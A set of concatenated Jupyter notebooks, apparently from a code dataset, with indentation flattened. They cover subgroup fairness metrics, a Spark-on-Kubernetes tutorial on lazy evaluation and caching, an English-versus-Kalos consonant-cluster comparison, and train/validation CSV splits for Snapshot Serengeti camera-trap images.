array = [[_TP, _FN, f'TPR = {_TPR:.2f}'],
[_FP, _TN, f'TNR = {_TNR:.2f}'],
[f'FDR = {_FDR:.2f}', f'FOR = {_FOR:.2f}', f'BR = {_BR:.2f}'],
[f'PR = {_PR:.2f}', f'NR = {_NR:.2f}', ''],
]
df = pd.DataFrame(array, index=['Y = 1', 'Y = 0', '', ' '], columns=['Ŷ = 1', 'Ŷ = 0', ''])  # labels match the [TP, FN] / [FP, TN] row order built above
if title is not None:
display(Markdown(title))
display(df.style.set_table_styles([{'selector': 'td', 'props':[('text-align', 'center')]},
{'selector': 'th', 'props': [('text-align', 'center')]}],
overwrite=False))
pretty_fairness_confusion_mattrix(y_test, y_pred, title='**Fairness confusion matrix**')
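# The markdown above lists more metrics than the matrix display shows. A sketch
# computing the full set from a confusion matrix (same TN/FP/FN/TP convention as
# above; the helper name `fairness_metrics` is ours, not from the paper's code):
def fairness_metrics(y_label, y_pred):
    """Return all statistical fairness metrics listed above as a dict"""
    TN, FP, FN, TP = confusion_matrix(y_label, y_pred).flatten()
    P, N = TP + FN, TN + FP
    return {
        'BR': P / (P + N),            # base rate
        'PR': (TP + FP) / (P + N),    # positive rate
        'NR': (TN + FN) / (P + N),    # negative rate
        'ACC': (TP + TN) / (P + N),   # accuracy
        'MR': (FN + FP) / (P + N),    # misclassification rate
        'TPR': TP / P,                # true positive rate (recall)
        'TNR': TN / N,                # true negative rate
        'FPR': FP / N,                # false positive rate
        'FNR': FN / P,                # false negative rate (silence)
        'FDR': FP / (TP + FP),        # false discovery rate (noise)
        'PPV': TP / (TP + FP),        # positive predicted value (precision)
        'FOR': FN / (TN + FN),        # false omission rate
        'NPV': TN / (TN + FN),        # negative predicted value
    }
fairness_metrics(y_test, y_pred)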
# function pretty_fairness_confusion_mattrix_by_subgroup()
def pretty_fairness_confusion_mattrix_by_subgroup(X, col, X_test, y_label, y_pred, q=4):
"""Pretty print fairness confusion matrix by subgroup
X: dataset
col: column used for splitting into subgroups
X_test: test dataset
y_label: target for test dataset
y_pred: predictions for test dataset
q: number of quantile bins used for a numerical column"""
# if col is numeric, use quantile
cat = pd.qcut(X[col], q) if is_numeric_dtype(X[col]) else X[col]
# select test data
cat = cat.loc[X_test.index]
# switch y_pred to Series so as to be able to select by subgroup
y_pred = pd.Series(y_pred, index=y_label.index)
# loop on subgroups
for value in sorted(cat.unique()):
X_select = X_test.loc[cat == value]
pretty_fairness_confusion_mattrix(y_label.loc[X_select.index],
y_pred.loc[X_select.index],
title=f'**Subgroup**: {col} = {value}')
pretty_fairness_confusion_mattrix_by_subgroup(X, 'sex', X_test, y_test, y_pred)
pretty_fairness_confusion_mattrix_by_subgroup(X, 'Age in years', X_test, y_test, y_pred)
###Output
_____no_output_____ |
3-spark-kubernetes/3-spark-kubernetes.ipynb | ###Markdown
Spark Kubernetes cluster

After a short discovery session of the local execution environment in the introduction, and then of the S3 API, we are now going to discover the **Kubernetes** execution environment.

The architecture is traditionally pictured as a driver program that connects to a cluster manager, which in turn schedules the executors.

As before, we will create a SparkContext in a Python notebook, which launches a JVM locally. This driver program will then connect to a cluster manager of the Kubernetes type in order to launch workers.

Spark-shell versus Spark-submit (client mode and cluster mode)

Now that we are starting to manipulate Spark clusters, it is important to go into these architectural details to understand properly what we are doing.

In a **Jupyter notebook we are doing spark-shell**, meaning the data scientist can interact with their Spark cluster live. This is very appealing, but do not forget that while we are developing and thinking about our next manipulations, our Spark application is already running and reserving resources from the cluster. It is therefore recommended to develop interactively with fewer resources and smaller datasets.

Conversely, it is possible to execute **Spark batches**. Since the program stops as soon as it has finished its work, there is no waste of resources caused by the interaction and the waiting for the data scientist's commands.

These batches are executed via the **spark-submit** command, whose help I display below.
###Code
! /opt/spark/bin/spark-submit --help
###Output
Usage: spark-submit [options] <app jar | python file | R file> [app arguments]
Usage: spark-submit --kill [submission ID] --master [spark://...]
Usage: spark-submit --status [submission ID] --master [spark://...]
Usage: spark-submit run-example [options] example-class [example args]
Options:
--master MASTER_URL spark://host:port, mesos://host:port, yarn,
k8s://https://host:port, or local (Default: local[*]).
--deploy-mode DEPLOY_MODE Whether to launch the driver program locally ("client") or
on one of the worker machines inside the cluster ("cluster")
(Default: client).
--class CLASS_NAME Your application's main class (for Java / Scala apps).
--name NAME A name of your application.
--jars JARS Comma-separated list of jars to include on the driver
and executor classpaths.
--packages Comma-separated list of maven coordinates of jars to include
on the driver and executor classpaths. Will search the local
maven repo, then maven central and any additional remote
repositories given by --repositories. The format for the
coordinates should be groupId:artifactId:version.
--exclude-packages Comma-separated list of groupId:artifactId, to exclude while
resolving the dependencies provided in --packages to avoid
dependency conflicts.
--repositories Comma-separated list of additional remote repositories to
search for the maven coordinates given with --packages.
--py-files PY_FILES Comma-separated list of .zip, .egg, or .py files to place
on the PYTHONPATH for Python apps.
--files FILES Comma-separated list of files to be placed in the working
directory of each executor. File paths of these files
in executors can be accessed via SparkFiles.get(fileName).
--archives ARCHIVES Comma-separated list of archives to be extracted into the
working directory of each executor.
--conf, -c PROP=VALUE Arbitrary Spark configuration property.
--properties-file FILE Path to a file from which to load extra properties. If not
specified, this will look for conf/spark-defaults.conf.
--driver-memory MEM Memory for driver (e.g. 1000M, 2G) (Default: 1024M).
--driver-java-options Extra Java options to pass to the driver.
--driver-library-path Extra library path entries to pass to the driver.
--driver-class-path Extra class path entries to pass to the driver. Note that
jars added with --jars are automatically included in the
classpath.
--executor-memory MEM Memory per executor (e.g. 1000M, 2G) (Default: 1G).
--proxy-user NAME User to impersonate when submitting the application.
This argument does not work with --principal / --keytab.
--help, -h Show this help message and exit.
--verbose, -v Print additional debug output.
--version, Print the version of current Spark.
Cluster deploy mode only:
--driver-cores NUM Number of cores used by the driver, only in cluster mode
(Default: 1).
Spark standalone or Mesos with cluster deploy mode only:
--supervise If given, restarts the driver on failure.
Spark standalone, Mesos or K8s with cluster deploy mode only:
--kill SUBMISSION_ID If given, kills the driver specified.
--status SUBMISSION_ID If given, requests the status of the driver specified.
Spark standalone, Mesos and Kubernetes only:
--total-executor-cores NUM Total cores for all executors.
Spark standalone, YARN and Kubernetes only:
--executor-cores NUM Number of cores used by each executor. (Default: 1 in
YARN and K8S modes, or all available cores on the worker
in standalone mode).
Spark on YARN and Kubernetes only:
--num-executors NUM Number of executors to launch (Default: 2).
If dynamic allocation is enabled, the initial number of
executors will be at least NUM.
--principal PRINCIPAL Principal to be used to login to KDC.
--keytab KEYTAB The full path to the file that contains the keytab for the
principal specified above.
Spark on YARN only:
--queue QUEUE_NAME The YARN queue to submit to (Default: "default").
###Markdown
This batch can then be executed in two operating modes:
* client mode, in which the Spark driver is executed directly on the local JVM.
* cluster mode, in which the Spark driver is executed on one of the Spark cluster's nodes.

In the rest of this tutorial, I will keep using the interactive shell, which is perfectly suited to working in a notebook. But you can run the examples shipped with the distribution on Kubernetes from a terminal (File -> New -> Terminal) by doing spark-submit (batch mode).

```
/opt/spark/bin/spark-submit \
  --master k8s://https://kubernetes.default:443 \
  --deploy-mode cluster \
  --name spark-pi \
  --class org.apache.spark.examples.SparkPi \
  --conf spark.executor.instances=5 \
  --conf spark.kubernetes.container.image=$IMAGE_NAME \
  --conf spark.kubernetes.namespace=$KUBERNETES_NAMESPACE \
  --conf spark.kubernetes.authenticate.driver.serviceAccountName=$KUBERNETES_SERVICE_ACCOUNT \
  local:///opt/spark/examples/jars/spark-examples_2.12-3.0.1.jar

/opt/spark/bin/spark-submit \
  --master k8s://https://kubernetes.default:443 \
  --deploy-mode cluster \
  --name spark-pi \
  --conf spark.executor.instances=5 \
  --conf spark.kubernetes.container.image=$IMAGE_NAME \
  --conf spark.kubernetes.namespace=$KUBERNETES_NAMESPACE \
  --conf spark.kubernetes.authenticate.driver.serviceAccountName=$KUBERNETES_SERVICE_ACCOUNT \
  local:///opt/spark/examples/src/main/python/pi.py 1000
```
###Code
import os
import s3fs
endpoint = "https://"+os.environ['AWS_S3_ENDPOINT']
fs = s3fs.S3FileSystem(client_kwargs={'endpoint_url': endpoint})
from pyspark.sql import SparkSession
spark = (SparkSession
.builder
# default URL of the Kubernetes API when accessed from inside the cluster
# (here the notebook itself runs inside Kubernetes)
.master("k8s://https://kubernetes.default.svc:443")
# image for the Spark executors: for simplicity we reuse the notebook's own image
.config("spark.kubernetes.container.image", os.environ['IMAGE_NAME'])
# name of the Kubernetes namespace
.config("spark.kubernetes.namespace", os.environ['KUBERNETES_NAMESPACE'])
# number of Spark executors: as many Kubernetes pods as this number will be launched
.config("spark.executor.instances", "5")
# memory allocated to the JVM
# Warning: by default the Kubernetes pod will have a higher limit that depends on other parameters.
# We will experiment below to check the total memory limit of an executor
.config("spark.executor.memory", "4g")
.config("spark.executor.memory", "4g")
.config("spark.kubernetes.driver.pod.name", os.environ['KUBERNETES_POD_NAME'])
.getOrCreate()
)
sc = spark.sparkContext
# Name of the service account used to contact the Kubernetes API: note that the datalab package itself creates this environment variable.
# Inside a pod of the Kubernetes cluster you would read the file /var/run/secrets/kubernetes.io/serviceaccount/token
# This parameter is nevertheless unnecessary here, because the local Kubernetes context of this notebook is preconfigured
# conf.set("spark.kubernetes.authenticate.driver.serviceAccountName", os.environ['KUBERNETES_SERVICE_ACCOUNT'])
# Settings for persisting Spark application logs
# Warning: these settings require creating a spark-history folder; Spark does not create it itself, for obscure reasons
# import s3fs
# endpoint = "https://"+os.environ['AWS_S3_ENDPOINT']
# fs = s3fs.S3FileSystem(client_kwargs={'endpoint_url': endpoint})
# fs.touch('s3://tm8enk/spark-history/.keep')
# sparkconf.set("spark.eventLog.enabled","true")
# sparkconf.set("spark.eventLog.dir","s3a://tm8enk/spark-history")
###Output
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by org.apache.spark.unsafe.Platform (file:/opt/spark/jars/spark-unsafe_2.12-3.2.0.jar) to constructor java.nio.DirectByteBuffer(long,int)
WARNING: Please consider reporting this to the maintainers of org.apache.spark.unsafe.Platform
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
2021-11-04 11:00:21,600 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Setting default log level to "WARN".
To adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel).
###Markdown
The Spark context starts, and if we use a terminal to display all the pods in our namespace, we can see that Spark has launched 5 executors, which are containers within the Kubernetes cluster. Pretty cool!
###Code
!kubectl get pods
###Output
I1104 11:00:34.162086 605 request.go:665] Waited for 1.094928244s due to client-side throttling, not priority and fairness, request: GET:https://kubernetes.default/apis/cert-manager.io/v1alpha2?timeout=32s
NAME READY STATUS RESTARTS AGE
jupyter-727809-54795c5c7f-nt2jx 1/1 Running 0 87s
pyspark-shell-bab4157cea9b5cee-exec-1 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-2 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-3 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-4 1/1 Running 0 14s
pyspark-shell-bab4157cea9b5cee-exec-5 1/1 Running 0 14s
vscode-25752-d6c97f84b-jsk4t 1/1 Running 0 45h
###Markdown
We can even try to mess with Spark to see what happens, by brutally deleting an executor.
###Code
!kubectl delete pods pyspark-shell-bab4157cea9b5cee-exec-1
!kubectl get pods
###Output
I1104 11:01:14.912464 752 request.go:665] Waited for 1.147621913s due to client-side throttling, not priority and fairness, request: GET:https://kubernetes.default/apis/kyverno.io/v1alpha1?timeout=32s
NAME READY STATUS RESTARTS AGE
jupyter-727809-54795c5c7f-nt2jx 1/1 Running 0 2m8s
pyspark-shell-bab4157cea9b5cee-exec-2 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-3 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-4 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-5 1/1 Running 0 55s
pyspark-shell-bab4157cea9b5cee-exec-6 1/1 Running 0 17s
vscode-25752-d6c97f84b-jsk4t 1/1 Running 0 45h
###Markdown
**Conclusion**: quite simply, the Spark driver relaunched another executor. Even in the middle of a computation, Spark could still have finished its processing without a hitch. Try to design a resilient distributed processing system yourself and you will understand the value of trusting proven frameworks for this kind of thing.

Back to our tweets, on a local file
###Code
!mc cp s3/projet-spark-lab/diffusion/formation/data/trump-tweets/trump_insult_tweets_2014_to_2021.csv .
text_file = sc.textFile("trump_insult_tweets_2014_to_2021.csv")
counts = text_file.flatMap(lambda line: line.split(" ")) \
.map(lambda word: (word, 1)) \
.reduceByKey(lambda a, b: a + b) \
.sortBy(lambda a : - a[1])
###Output
2021-11-04 11:01:55,792 WARN scheduler.TaskSetManager: Lost task 1.0 in stage 0.0 (TID 1) (10.233.118.242 executor 3): java.io.FileNotFoundException: File file:/home/jovyan/work/spark-formation/trump_insult_tweets_2014_to_2021.csv does not exist
at org.apache.hadoop.fs.RawLocalFileSystem.deprecatedGetFileStatus(RawLocalFileSystem.java:779)
at org.apache.hadoop.fs.RawLocalFileSystem.getFileLinkStatusInternal(RawLocalFileSystem.java:1100)
at org.apache.hadoop.fs.RawLocalFileSystem.getFileStatus(RawLocalFileSystem.java:769)
at org.apache.hadoop.fs.FilterFileSystem.getFileStatus(FilterFileSystem.java:462)
at org.apache.hadoop.fs.ChecksumFileSystem$ChecksumFSInputChecker.<init>(ChecksumFileSystem.java:160)
at org.apache.hadoop.fs.ChecksumFileSystem.open(ChecksumFileSystem.java:372)
at org.apache.hadoop.fs.ChecksumFileSystem.lambda$openFileWithOptions$0(ChecksumFileSystem.java:896)
at org.apache.hadoop.util.LambdaUtils.eval(LambdaUtils.java:52)
at org.apache.hadoop.fs.ChecksumFileSystem.openFileWithOptions(ChecksumFileSystem.java:894)
at org.apache.hadoop.fs.FileSystem$FSDataInputStreamBuilder.build(FileSystem.java:4768)
at org.apache.hadoop.mapred.LineRecordReader.<init>(LineRecordReader.java:115)
at org.apache.hadoop.mapred.TextInputFormat.getRecordReader(TextInputFormat.java:67)
at org.apache.spark.rdd.HadoopRDD$$anon$1.liftedTree1$1(HadoopRDD.scala:286)
at org.apache.spark.rdd.HadoopRDD$$anon$1.<init>(HadoopRDD.scala:285)
at org.apache.spark.rdd.HadoopRDD.compute(HadoopRDD.scala:243)
at org.apache.spark.rdd.HadoopRDD.compute(HadoopRDD.scala:96)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.rdd.MapPartitionsRDD.compute(MapPartitionsRDD.scala:52)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.api.python.PythonRDD.compute(PythonRDD.scala:65)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.api.python.PairwiseRDD.compute(PythonRDD.scala:115)
at org.apache.spark.rdd.RDD.computeOrReadCheckpoint(RDD.scala:373)
at org.apache.spark.rdd.RDD.iterator(RDD.scala:337)
at org.apache.spark.shuffle.ShuffleWriteProcessor.write(ShuffleWriteProcessor.scala:59)
at org.apache.spark.scheduler.ShuffleMapTask.runTask(ShuffleMapTask.scala:99)
at org.apache.spark.scheduler.ShuffleMapTask.runTask(ShuffleMapTask.scala:52)
at org.apache.spark.scheduler.Task.run(Task.scala:131)
at org.apache.spark.executor.Executor$TaskRunner.$anonfun$run$3(Executor.scala:506)
at org.apache.spark.util.Utils$.tryWithSafeFinally(Utils.scala:1462)
at org.apache.spark.executor.Executor$TaskRunner.run(Executor.scala:509)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
at java.base/java.lang.Thread.run(Thread.java:829)
2021-11-04 11:01:55,949 ERROR scheduler.TaskSetManager: Task 0 in stage 0.0 failed 4 times; aborting job
[Stage 0:> (0 + 1) / 2]
###Markdown
**Conclusion**: of course this fails, because the file is only present locally on the driver, not on the executors. It is absolutely necessary to rely on a non-local source as soon as computations are distributed over a cluster.

On a remote file it works much better:
###Code
text_file = sc.textFile("s3a://projet-spark-lab/diffusion/formation/data/trump-tweets/trump_insult_tweets_2014_to_2021.csv")
counts = text_file.flatMap(lambda line: line.split(" ")) \
.map(lambda word: (word, 1)) \
.reduceByKey(lambda a, b: a + b) \
.sortBy(lambda a : - a[1] )
counts.take(20)
###Output
###Markdown
The data: SIRENE open data

The rest of this tutorial discusses Spark's internal logic, independently of the resource manager used.

We still have this data on the diffusion space, except that this time we are going to use the schema metadata.
###Code
import json
from pyspark.sql.types import StructType
with fs.open('s3://projet-spark-lab/diffusion/formation/schema/sirene/sirene.schema.json') as f:
a = f.read()
schema = StructType.fromJson(json.loads(a))
df = (spark.read
.format("csv")
.options(header='true', inferschema='false', delimiter=',')
.schema(schema)
.load("s3a://projet-spark-lab/diffusion/formation/data/sirene/sirene.csv")
)
df.printSchema()
###Output
root
|-- siren: integer (nullable = true)
|-- nic: integer (nullable = true)
|-- siret: long (nullable = true)
|-- dateFin: string (nullable = true)
|-- dateDebut: string (nullable = true)
|-- etatAdministratifEtablissement: string (nullable = true)
|-- changementEtatAdministratifEtablissement: boolean (nullable = true)
|-- enseigne1Etablissement: string (nullable = true)
|-- enseigne2Etablissement: string (nullable = true)
|-- enseigne3Etablissement: string (nullable = true)
|-- changementEnseigneEtablissement: boolean (nullable = true)
|-- denominationUsuelleEtablissement: string (nullable = true)
|-- changementDenominationUsuelleEtablissement: boolean (nullable = true)
|-- activitePrincipaleEtablissement: string (nullable = true)
|-- nomenclatureActivitePrincipaleEtablissement: string (nullable = true)
|-- changementActivitePrincipaleEtablissement: string (nullable = true)
|-- caractereEmployeurEtablissement: string (nullable = true)
|-- changementCaractereEmployeurEtablissement: string (nullable = true)
###Markdown
**WHAT?????**

The line `df = spark.read...` now executes instantly... even though the file is 6 GB. To understand why, you have to know its two purposes:
* define the dataframe
* define/know the schema

Spark SQL, the Spark module that works with structured data, needs the schema to be able to optimize the execution plan of the Spark job. As last time, we can go through a view of the table to perform SQL operations:
###Code
df.createOrReplaceTempView("sirene")
sqlDF = spark.sql("SELECT * FROM sirene")
sqlDF.printSchema()
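# a quick aside: sqlDF.explain(True) would print the parsed, analyzed, optimized
# and physical plans without triggering any computation (explain is standard PySpark)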
###Output
root
|-- siren: integer (nullable = true)
|-- nic: integer (nullable = true)
|-- siret: long (nullable = true)
|-- dateFin: string (nullable = true)
|-- dateDebut: string (nullable = true)
|-- etatAdministratifEtablissement: string (nullable = true)
|-- changementEtatAdministratifEtablissement: boolean (nullable = true)
|-- enseigne1Etablissement: string (nullable = true)
|-- enseigne2Etablissement: string (nullable = true)
|-- enseigne3Etablissement: string (nullable = true)
|-- changementEnseigneEtablissement: boolean (nullable = true)
|-- denominationUsuelleEtablissement: string (nullable = true)
|-- changementDenominationUsuelleEtablissement: boolean (nullable = true)
|-- activitePrincipaleEtablissement: string (nullable = true)
|-- nomenclatureActivitePrincipaleEtablissement: string (nullable = true)
|-- changementActivitePrincipaleEtablissement: string (nullable = true)
|-- caractereEmployeurEtablissement: string (nullable = true)
|-- changementCaractereEmployeurEtablissement: string (nullable = true)
###Markdown
**RE-WHAT?????**

Another instantaneous execution... there is a mystery here, and it is now time to really dive into the Spark world.

LAZY EVALUATION, TRANSFORMATIONS and ACTIONS

First of all, you should know that in Spark there are two types of operations: **transformations** and **actions**. Transformations in Spark are what we call **lazy**, which means that when you execute transformation functions in Spark, the framework will not execute them right away but keeps a record of the function called. Together, these operations build a DAG (Directed Acyclic Graph: we will talk about this graph in detail in a future tutorial devoted to the anatomy of a Spark job). All the operations of a Spark treatment are executed when a function of the action type is invoked in the program (for example: a count, a reduce, a write...).

You have to see that in Spark there are two worlds:
* Spark's memory
* the rest of the world

As long as we define a dataframe (without inferring the schema) and manipulate it by selecting columns or rows, Spark will not execute anything. Spark waits until the very last moment, namely when we want data to leave (an action):
* to distributed storage (S3 for example)
* to the Spark driver that pilots the job (and yes, the driver is also part of the rest of the world)

By the way, you can look at your Spark UI: no job has been launched yet...
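As a minimal illustration (using two columns from the schema printed above), nothing here triggers any work until the final `count()`:

```
subset = sqlDF.select("siren", "nic")   # transformation: lazy, nothing runs
active = subset.where("nic > 1")        # transformation: still lazy
active.count()                          # action: the whole plan executes now
```

On to the first action: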
###Code
sqlDF.first()
###Output
###Markdown
**Lazy, so no wasted effort**

My file is 6 GB. I defined a transformation to select all the rows, then I defined an action to display only the first row of the dataframe... and clearly, given the speed of the execution, Spark did not download the whole file from S3 but only its first bytes.

**Lazy, so still be careful**

In the following example we will count the number of rows of the sirene dataframe 3 times in a row.
###Code
%%timeit -r3
sqlDF.count()
###Output
[Stage 19:====================================================> (50 + 3) / 53]
###Markdown
You can confirm that reading the 6 GB from storage takes 26 seconds, and this happens every time we count the number of rows of the dataframe. There is no caching by default. It will be your job to produce efficient code by persisting your data in Spark on first use.
###Code
sqlDF.cache()
###Output
_____no_output_____
###Markdown
The cache instruction is also lazy... and the persistence (cache) will be performed at the next global action on the dataframe (such as a count).
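Instead of `cache()` (shorthand for the default storage level), you can call `persist` with an explicit storage level; a sketch:

```
from pyspark import StorageLevel
sqlDF.persist(StorageLevel.MEMORY_AND_DISK)  # also lazy: takes effect at the next action
```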
###Code
%%timeit -r5
sqlDF.count()
###Output
###Markdown
And you can check on your Spark UI: the first job was very long, since Spark had extra work to do to cache the data (in particular it has to change the data format, which is why we go from a CSV of more than 6 GB to 2.9 GB), but afterwards all the following jobs executed from the cached data, without ever going back to read the file on S3. The Storage tab gives you information about the cached RDDs, the number of partitions, and whether the data could be kept in memory or on the executors' disks.

A first group-by to conclude this tutorial. We will group the cached data by APE code without using the SQL syntax.
###Code
from pyspark.sql.functions import desc
%%timeit
sqlDF.groupBy("activitePrincipaleEtablissement").count().sort(desc("count")).head(10)
###Output
[Stage 61:======================================================> (52 + 1) / 53]
###Markdown
Conclusion

This tutorial was a bit denser in information:
* execution on a cluster rather than locally, but with the same code
* a first grasp of the concepts of transformations, actions and lazy evaluation
* a first grasp of data caching

I suggest you release the resources consumed by your Spark session.
###Code
spark.stop()
###Output
2021-11-04 11:44:26,300 WARN k8s.ExecutorPodsWatchSnapshotSource: Kubernetes client has been closed.
|
src/continuous-consonants.ipynb | ###Markdown
A comparison of consonant clusters between English and the Kalos language
###Code
import csv
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
consonants = 'bcdfghjklmnpqrstvwxyz'
n = len(consonants)
def cluster_array(text):
arr = np.zeros((n, n))
text = text.lower()
for x, y in zip(text, text[1:]):
ix = consonants.find(x)
iy = consonants.find(y)
if ix > -1 and iy > -1:
arr[ix][iy] += 1
return arr
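# quick sanity check of cluster_array (illustrative example): in "strength" the
# consonant pairs are st, tr, ng, gt and th, so each corresponding cell equals 1
demo = cluster_array("strength")
assert demo[consonants.find('s')][consonants.find('t')] == 1
assert demo[consonants.find('t')][consonants.find('h')] == 1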
with open('tweets.csv') as csvfile:
reader = csv.reader(csvfile)
next(reader)
kalos = '\n'.join(row[1] for row in reader)
###Output
_____no_output_____
###Markdown
Consonant cluster tendencies in English

Frequency of consonant clusters in English

In English, the consonant pair `th` stands out as remarkably frequent.
###Code
arr = cluster_array(open('Alice\'s Adventures in Wonderland by Lewis Carroll.txt').read())
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____
###Markdown
Presence or absence of consonant clusters in English
###Code
# turn into yes/no matrix:
arr = arr > 0
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____
###Markdown
Consonant cluster tendencies in Kalos Frequency of consonant clusters in Kalos Unlike English, consonant clusters occur fairly evenly across all pairs.
###Code
arr = cluster_array(kalos)
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____
###Markdown
Presence or absence of consonant clusters in Kalos In Kalos, every combination of consonants occurs.
###Code
# turn into yes/no matrix:
arr = arr > 0
fig, ax = plt.subplots()
im = ax.imshow(arr)
ax.set_xticks(np.arange(n))
ax.set_yticks(np.arange(n))
ax.set_xticklabels(list(consonants))
ax.set_yticklabels(list(consonants))
plt.show()
###Output
_____no_output_____ |
notebooks/snapshot_serengeti_split_genarate_csv_list.ipynb | ###Markdown
Loading Snapshot Serengeti data
###Code
import json
import os

import pandas as pd

with open('../data/SnapshotSerengetiSplits_v0.json') as json_file:
recommend_train_val_splits = json.load(json_file)
serengeti_annotations = pd.read_csv('../data/SnapshotSerengeti_v2_1_annotations.csv')
serengeti_annotations = serengeti_annotations[['capture_id', 'season', 'site', 'question__species']].copy()
serengeti_images = pd.read_csv('../data/SnapshotSerengeti_v2_1_images.csv')
serengeti_images = serengeti_images.drop('Unnamed: 0', axis=1)
serengeti_images_labeled = pd.merge(serengeti_images, serengeti_annotations, on='capture_id', how='outer')
###Output
_____no_output_____
###Markdown
We will only use seasons 1-6:
###Code
serengeti_images_labeled = serengeti_images_labeled[
serengeti_images_labeled.season.isin(['S1', 'S2', 'S3', 'S4', 'S5', 'S6'])].copy()
###Output
_____no_output_____
###Markdown
Remove images with more than one species identified
###Code
non_single_spc_instances = serengeti_images_labeled[
serengeti_images_labeled[['image_path_rel']].duplicated(keep=False)]
non_single_spc_instances = non_single_spc_instances.image_path_rel.unique()
serengeti_images_labeled = serengeti_images_labeled[
~serengeti_images_labeled.image_path_rel.isin(non_single_spc_instances)].copy()
###Output
_____no_output_____
###Markdown
Split by site: Mark train/val images:
###Code
val_dev = ['D09',
'J06',
'C12',
'B12',
'F11',
'C08',
'E07',
'O09',
'Q07',
'C13',
'E04',
'I06',
'D10',
'I08',
'M11',
'F02',
'D06',
'G09',
'N03',
'E10',
'J09',
'H13',
'T13']
#val_dev = random.sample(recommend_train_val_splits['splits']['train'], 23)
serengeti_images_labeled_split = serengeti_images_labeled.copy()
def mark_split(row):
if row['site'] in val_dev:
return 'val_dev'
elif row['site'] in recommend_train_val_splits['splits']['train']:
return 'train'
else:
return 'val'
serengeti_images_labeled_split['split'] = serengeti_images_labeled_split.apply(mark_split, axis=1)
pd.crosstab(serengeti_images_labeled_split.question__species, serengeti_images_labeled_split.split)
###Output
_____no_output_____
###Markdown
Select instances:
###Code
serengeti_images_labeled_split
def binarize_categories(row):
if row['question__species'] == 'blank':
return 0
else:
return 1
instances = serengeti_images_labeled_split[['image_path_rel', 'question__species', 'split']].copy()
instances['category'] = instances.apply(binarize_categories, axis=1)
pd.crosstab(instances.category, instances.split)
###Output
_____no_output_____
###Markdown
Verify if images were sized correctly:
###Code
ss_path = '/data/fagner/coruja/datasets/serengeti/serengeti_600x1024/'
all_images_download = [value['image_path_rel']
                       for key, value in instances.iterrows()
                       if os.path.isfile(ss_path + value['image_path_rel'])]
len(all_images_download)
len(instances)
instances = instances[instances.image_path_rel.isin(all_images_download)].copy()
###Output
_____no_output_____
###Markdown
Saving csv files
###Code
def save_split(data, split, col_file_name, col_category, file_patern):
data_processed = data[data.split == split].copy()
data_processed['file_name'] = data_processed[col_file_name]
data_processed['category'] = data_processed[col_category]
file_name = file_patern % split
data_processed[['file_name', 'category']].to_csv(file_name, index=False)
save_split(instances, 'train', 'image_path_rel', 'category', '../data/ss_%s_empty.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'category', '../data/ss_%s_empty.csv')
save_split(instances, 'val', 'image_path_rel', 'category', '../data/ss_%s_empty.csv')
save_split(instances, 'train', 'image_path_rel', 'question__species', '../data/ss_%s_species.csv')
save_split(instances, 'val_dev', 'image_path_rel', 'question__species', '../data/ss_%s_species.csv')
save_split(instances, 'val', 'image_path_rel', 'question__species', '../data/ss_%s_species.csv')
###Output
_____no_output_____
###Markdown
Balancing classes for empty/nonempty model:
###Code
# Downsample the empty class so it matches the number of non-empty training rows
train_empty_sample = instances[(instances.split == 'train') & (instances.category == 0)].sample(524804).copy()
instances_bal = pd.concat([train_empty_sample,
instances[(instances.split == 'train') & (instances.category == 1)]])
save_split(instances_bal, 'train', 'image_path_rel', 'category', '../data/ss_%s_empty_bal.csv')
###Output
_____no_output_____
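###Markdown
Rather than hard-coding the sample size, it can be derived from the data (a sketch; `n_nonempty` is a name introduced here, and it should match the hard-coded figure above):
###Code
# Sketch: compute the balanced sample size instead of hard-coding it
n_nonempty = len(instances[(instances.split == 'train') & (instances.category == 1)])
train_empty_sample = instances[(instances.split == 'train')
                               & (instances.category == 0)].sample(n_nonempty).copy()
###Output
_____no_output_____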
###Markdown
Split by time:
###Code
serengeti_images_labeled_split_time = serengeti_images_labeled.copy()
def mark_time_split(row):
if row['season'] in ['S6'] :
return 'val'
elif row['season'] in ['S5']:
return 'val_dev'
else:
return 'train'
serengeti_images_labeled_split_time['split'] = serengeti_images_labeled_split_time.apply(mark_time_split, axis=1)
serengeti_images_labeled_split_time
pd.crosstab(serengeti_images_labeled_split_time.question__species, serengeti_images_labeled_split_time.split)
def binarize_categories(row):
if row['question__species'] == 'blank':
return 0
else:
return 1
instances = serengeti_images_labeled_split_time[['image_path_rel', 'question__species', 'split']].copy()
instances['category'] = instances.apply(binarize_categories, axis=1)
